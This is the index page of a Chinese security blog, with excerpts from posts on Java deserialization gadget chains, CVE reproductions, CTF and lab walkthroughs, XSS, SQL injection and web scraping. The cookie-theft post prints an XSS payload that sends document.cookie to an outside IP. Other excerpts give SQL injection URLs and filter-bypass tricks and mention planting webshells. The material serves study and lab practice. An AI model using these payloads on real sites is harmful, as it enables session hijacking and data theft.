鸣蜩十四的博客

原创 反序列化-Shiro-550详细分析

Shiro-550漏洞是攻击者直接就可以用密钥实现框架加密过程，在Cookie字段写入想要服务端执行的恶意代码，最后服务端在对cookie进行解密的时候（反序列化后）就会执行恶意代码

原创 Commons-Collections篇-CC6链分析

我们前两篇已经分析过URLDNS链和CC1链，我们这次分析的链就是基于前两条链之上的CC6链CC6链的使用对于版本来说没有CC1限制那么大，只需要commons collections 小于等于3.2.1，都存在这个漏洞。

原创 Commons-Collections篇-CC7链

和CC5反序列化链相似，CC7也是后半条LazyMap执行命令链不变，但是中间过程通过AbstractMap.equals()触发LazyMap.get()方法。

原创 Commons-Collections篇-CC5链分析

CC5链和CC1差不多，只不过调用LazyMap.get()是通过TiedMapEntry.toString()触发的

原创 Commons-Collections篇-CC2链分析

CC2链主要和CC4一样，但是区别在于CC2避免了使用Transformer数组，没有使用InstantiateTransformer类进行初始化，主要分析中间连接部分也就是CC2链重心。

原创 Commons-Collections篇-CC4链分析

CC4链中命令执行点还是一致的，可以用TransformingComparator来代替。

原创 Commons-Collections篇-CC3链

我们分析前两条链CC1和CC6时，都是利用invoke反射调用的Runtime().getRuntime().exec()来执行命令。而很多时候服务器的代码当中的黑名单会选择禁用Runtime。CC3链主要通过动态加载类加载机制来实现自动执行恶意类代码。

原创 CC1链补充-LazyMap

在我们上一篇中详细分析了CC1链，但是在CC1链中还有一条链就是LazyMap类

原创 Commons-Collections篇-CC1链小白基础分析学习

Apache Commons工具包中有⼀个组件叫做 Apache Commons Collections ，其封装了Java 的Collection(集合) 相关类对象，它提供了很多强有⼒的数据结构类型并且实现了各种集合工具类，CommonsCollections被⼴泛应⽤于各种Java应⽤的开发，而正是因为在大量web应⽤程序中这些类的实现以及⽅法的调用，导致了反序列化漏洞的普遍性和严重性

原创 反序列化之路-URLDNS

URLDNS 是ysoserial中一个利用链的名字，但准确来说，这个其实不能称作“利用链”。因为其参数不是一个可以“利用”的命令，而是一个URL，其能触发的结果也不是命令执行，而是一次DNS请求。但是因为其使用Java内置的类构造，对第三方库没有依赖，并且gadget也简单，适合成为我们初学者刚开始学习反序列化利用链的一个很好的开始。

原创 Java中的SQL注入简易分析

Java中的JDBC与Mybatis中的SQL注入简易分析

原创 CVE-2022-20261 Wordpress的插件SQL注入漏洞分析及修补

简介wordpress是世界上使用最多的开源 CMS 之一。在允许开发者自己构建插件和主题来管理网站时，使用我们的许多便捷功能，wordpress的核心会提供插件/主题调用和使用wordpress函数的功能，如数据格式、查询数据库等许多选项在提供的众多类中，WP提供的查询DB的类中有SQL Injection错误：WP_Query。WP_Query 是 WordPress 提供的一个用于处理复杂 SQL 查询的类，在 WordPress 核心框架和插件中使用范围非常广泛，用户可以通过 WP_Query 类

原创 CVE-2018-19127 phpcms 2008命令执行

简介PHPCMS网站内容管理系统是国内主流CMS系统之一，同时也是一个开源的PHP开发框架。phpcms2008老版本type.php存在代码注入可直接getshell。影响版本phpcms 2008漏洞分析漏洞的位置位于type.php中，在此文件当中包含template变量，template变量是用户能够通过传入参数控制的，同时可以看到该变量之后会被传入template()方法。跟进template()方法当中，方法把module,template和istag一同传入了template_c

原创 Redis未授权访问的三种利用方式

简介Redis是一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值存储数据库，并提供多种语言的API。漏洞描述Redis默认情况下会绑定在0.0.0.0:6379，如果在没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下可以利用Redis的相关方法，可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys文件中，进而可以直接登录目标服务

原创 Gerapy 远程命令执行（CVE-2021-32849）分析和复现

简介Gerapy是一款基于Scrapy、Scrapyd、Django和Vue.js的分布式爬虫管理框架。漏洞描述该漏洞源于程序没有正确清理通过project_clone端点传递给Popen的输入。攻击者可利用该漏洞执行任意命令。影响版本Gerapy <= 0.9.7代码分析此次漏洞产生于gerapy/server/core/views.py文件关键代码@api_view(['POST'])@permission_classes([IsAuthenticated])def pr

原创 UCMS文件上传漏洞(CVE-2020-25483)

简介UCMS是一套使用PHP语言编写的内容管理系统。漏洞概述UCMS v1.4.8版本存在安全漏洞，该漏洞源于文件写的fopen()函数存在任意命令执行漏洞，攻击者可利用该漏洞可以通过该漏洞访问服务器。影响版本UCMS v1.4.8测试环境使用的是vulfocus平台自带镜像，直接开启，进入靶场环境,目录为/ucms漏洞分析在1.4.8版本中，下载源码进行分析可以看到在fileedit.php中对上传的文件没有做任何过滤，导致任意文件上传漏洞在index.php文件中可以看到参数d

原创 爬虫学习-Scrape Center闯关(spa4,spa5,spa6)

场景这次记录的是spa系列的4-6个，分别对应的技巧是智能分析，有翻页批量抓取，js逆向分析关卡spa4新闻网站索引，无反爬，数据通过 Ajax 加载，无页码翻页，适合 Ajax 分析和动态页面渲染抓取以及智能页面提取分析。智能解析的知识点详情：智能解析详解我在本次实验中使用的是newspaper库:newspaper详解使用智能解析方便快捷，结果的话抓取十个链接，可能出错的有2-3个，还可以接受的总代码：import jsonimport pandas as pdimport re

原创 爬虫学习-Scrape Center闯关(spa系列1-3)

场景上次写了ssr系列，它主要依靠服务器渲染代码，并且没有什么困难的地方，主要学习的是request请求中的技巧和html页面元素的定位抓取等爬虫基础技巧。这次记录的是spa系列，这个系列的代码数据都通过Ajax加载，页面动态渲染，主要学习的是通过接口获取json数据并处理以及js的逆向分析，难度提升了一大截，这个系列我的目标是爬取首页每个电影的标题，主题，评分以及电影详情页里面的电影剧情技术json数据的处理，js逆向分析关卡spa1电影数据网站，无反爬，数据通过 Ajax 加载，页面动态渲染

原创 爬虫学习-scrape center闯关（ssr系列）

场景最近在学习爬虫，实践使用的是https://scrape.center/网站的环境第一关没有任何限制，结果爬取的是所有的电影地址，标题，主题，分数，剧情简介技术主要使用的是request库和BeautifulSoup，最后导出一个csv文档代码import pandas as pdimport urllib3from bs4 import BeautifulSoupimport requestsurllib3.disable_warnings() #去除因为网页没有ssl证书出现

原创 Tomcat文件写入 CVE-2017-12615 EXP

```pythonimport sysimport requestsdef title(): print("[-------------------------------------------------------------]") print("[-------------- Tomcat 文件写入漏洞 ---------------]") print("[-------- CVE-2017-12615 .

原创 Apache SkyWalking的Sql注入(cve-2020-9483)

简介Apache SkyWalking 是一款应用性能监控（APM）工具，对微服务、云原生和容器化应用提供自动化、高性能的监控方案。项目于 2015 年创建，并于 2017 年 12 月进入 Apache 孵化器。Apache SkyWalking 提供了分布式追踪，服务网格（Service Mesh）遥感数据分析，指标聚合和可视化等多种能力。项目覆盖范围，从一个单纯的分布式追踪系统，扩展为一个可观测性分析平台（observability analysis platform）和应用性能监控管理系统。漏

原创 Vulnstrack红队靶场二

一．搭建vulnstack靶场环境主要以真实企业环境为实例搭建一系列靶场，通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建，开成完整闭环，下载地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/3/这个靶场是三个目标，一个web服务器，PC机和最后的域控，然后web服务器添加一块网卡，一个nat模式，相当于处于外网中，另一个为仅主机模式，PC也是两块，一样的配置，而DC则仅主机模式，只能内网访问,这些下载好镜像已经提前配置好了，下来我们

原创 学习爬虫，从简单的小说爬取开始

import requestsfrom lxml import etreedef book(): url = "https://www.xbiquge.la/56/56564/" proxy={ "https": "http://127.0.0.1:7890" } response = requests.get(url,proxies=proxy) #获取url response.encoding='utf-8' #指定字符

原创 vulnstack内网渗透环境靶场-1 大全

一．搭建vulnstack靶场环境主要以真实企业环境为实例搭建一系列靶场，通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建，开成完整闭环，下载地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/2/这次靶场一共三个环境，win7，win2003，win2008，win7是web服务器，上面我们需要两张网卡，一张nat模式，一张主机模式，win2003是域成员，win2008为域控Win7配置如下：在win7中使用phpstudy开

原创 (CVE-2021-22214)Gitlab SSRF漏洞 漏洞复现

简介GitLab 是一个用于仓库管理系统的开源项目，使用Git作为代码管理工具，并在此基础上搭建起来的Web服务。漏洞描述GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git（版本控制系统）项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。Gitlab的CI lint API用于验证提供给gitlab ci的配置文件是否是yaml格式。而根据其说明文档文档，其include 操作支持remote选项，用于获取远端的yaml。因此在此处将

原创 (CVE-2021-27905)Apache Solr ssrf 漏洞复现

简介Apache Solr是美国阿帕奇（Apache）基金会的一款基于Lucene（一款全文搜索引擎）的搜索服务器，使用Java语言开发，主要基于http和Apache Lucene实现的，该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。漏洞描述Apache Solr 8.8.2之前版本存在安全漏洞，Apache Solr 中的 ReplicationHandler（通常注册在 Solr core下的“/replication”）有一个“masterUrl”（也是“leaderUrl”别名）参数，用

原创 CTFHub-Redis

和fastcgi的题比较类似，使用gopherus生成redis的shell，经过一次url编码，就构成了最终的payload，注意的是redis的端口是6379经过一次编码，bp使用gopher协议发包，虽然是504，但是我们的shell已经传输上去了，用蚁剑链接查看flag...

原创 Ctfhub-FastCGI

我们登陆环境，目前可以知道他的默认网站目录/var/www/html/index.php，我们可以使用gopherus工具，进行写入webshell，第一个为网站的php文件的地址，下面的为写入一句话木马到网站的对应位置，然后将payload进行一次url编码，在brup中写入成功，然后用蚁剑链接，找到flag...

原创 CTFHUB-上传文件

index.php文件的源码为：<?phperror_reporting(0);if (!isset($_REQUEST['url'])){ header("Location: /?url=_"); exit;}$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_FOLLO

原创 Ctfhub-POST请求

在题目中的环境初始链接为：http://challenge-fc6097d3c4b542ee.sandbox.ctfhub.com:10800/?url=_我们先用file://协议对index.php页面源码进行读取，http://challenge-fc6097d3c4b542ee.sandbox.ctfhub.com:10800/?url=file:///var/www/html/index.php,然后发现有一个/flag.php的页面，然后同样对其源码进行读取得到index.php的页面源码如

原创 CTFHub-file_get_contents

extract() 方法可用于将数组展开，键名作为变量名，元素值为变量值，简单的说，就是能够直接将 $_POST 和 $_GET 中的变量解析出来，不需要我们手工赋值处理。trim()去除字符串首尾处的空白字符file_get_contents()将整个文件读入一个字符串php://input可以访问请求的原始数据的只读流，在POST请求中访问POST的data部分，在enctype=“multipart/form-data” 的时候php://input 是无效的。我们先对代码进行分析，而全部代.

原创 XSS获取键盘原理

涉及的js知识：onkeypress 事件会在键盘按键被按下并释放一个键时发生fromCharCode() 可接受一个指定的 Unicode 值，然后返回一个字符串。charCode 事件属性 事件对象 实例 获取按下的键盘按键Unicode值XMLHttpRequest 对象能够：在不重新加载页面的情况下更新网页在页面已加载后从服务器请求数据在页面已加载后从服务器接收数据在后台向服务器发送数据encodeURI(key)对URI 进行完整的编码http.open第三个参数设置请求是否为

原创 xss的cookie窃取原理

原理：我们可以在有xss漏洞的网站插入跳入我们网站的xss代码，使用户触发漏洞的时候将cookie传入进来，我们进行接收具体实现： 攻击代码：<script>document.write('<img src="http://1.117.107.31/getcookie.php?cookie='+document.cookie+'" width=0 height=0 border=0 />');</script> 远程接收代码:<?php$c...

原创 DVWA之SQL Injection

SQL Injection:绕过空格（注释符/* */，%a0）括号绕过空格引号绕过（使用十六进制） %df%5c%27逗号绕过（使用from或者offset）or and xor not绕过：and=&& or=|| xor=| not=!绕过注释符号（#，--(后面跟一个空格））过滤：id=1' union select 1,2,3||'1=绕过：　使用like 、rlike 、regexp 或者 使用< 或者 >绕过union，select，wh...

原创 sql-lib 1-10关

1.字符型http://127.0.0.1:88/sql/Less-1/?id=1' order by 4%23失败http://127.0.0.1:88/sql/Less-1/?id=1' order by 3%23成功http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata%23 查看所有数据库ht...

原创 2021ISCC 部分web writeup

ISCC客服冲冲冲（一）在这道题目中让左边的票数超过右边的票数，我第一反应是写一个脚本刷票，而且看起来没有限制ip多次投票，所以写了一个比较简单的python自动点击投票 from selenium import webdriverdriver = webdriver.Chrome("C:\Program Files (x86)\Google\Chrome\Application\chromedriver.exe")driver.get("http://39.96.91.106:7020/test

原创 SQL注入（思维导图）

原创 初步信息收集小总结

一.查看是否有cdn可以先进行多地ping查看是否有cdn，如果返回多个ip则很有可能拥有cdn，此时就需要绕过cdn查看目标站点的真实ip地址绕过方法：1.通过子域名入手2.利用网站漏洞，例如phpinfo敏感信息泄露3.历史DNS记录4.邮件服务入手5.国外请求6.查询https证书7. 。。。还有很多大家可以上网一一试试还有一个问题就是如果绕过cdn以后，那么你怎么确认你获得的ip是真实的ip呢？可以在本地的host文件当中对域名进行绑定ip，cdn的ip是访问不到的二.查看是

原创 初步信息收集

对信息收集进行了初步的归总，在web初步的信息收集中大概就是以下的步骤，对于app则就几种，一种就是反编译，查看app的源码，另一种就是在app上进行抓包，查看是否有web协议，下一章记录一下具体的方法...

原创 ubuntu18.04安装LAMP开发环境

安装LAMP（linux+apache+mysql+php）开发环境建议开始之前先转到root用户，以下命令都是在root用户下直接执行，不用sudo首先先更新一下软件安装包apt-get update然后更新软件apt-get upgrade1.安装apacheapt-get install apache2可以后面加一个-y 可以默认yes问题检查是否apache默认为开启状态systemctl status apache2显示下面则为开启 Active: active (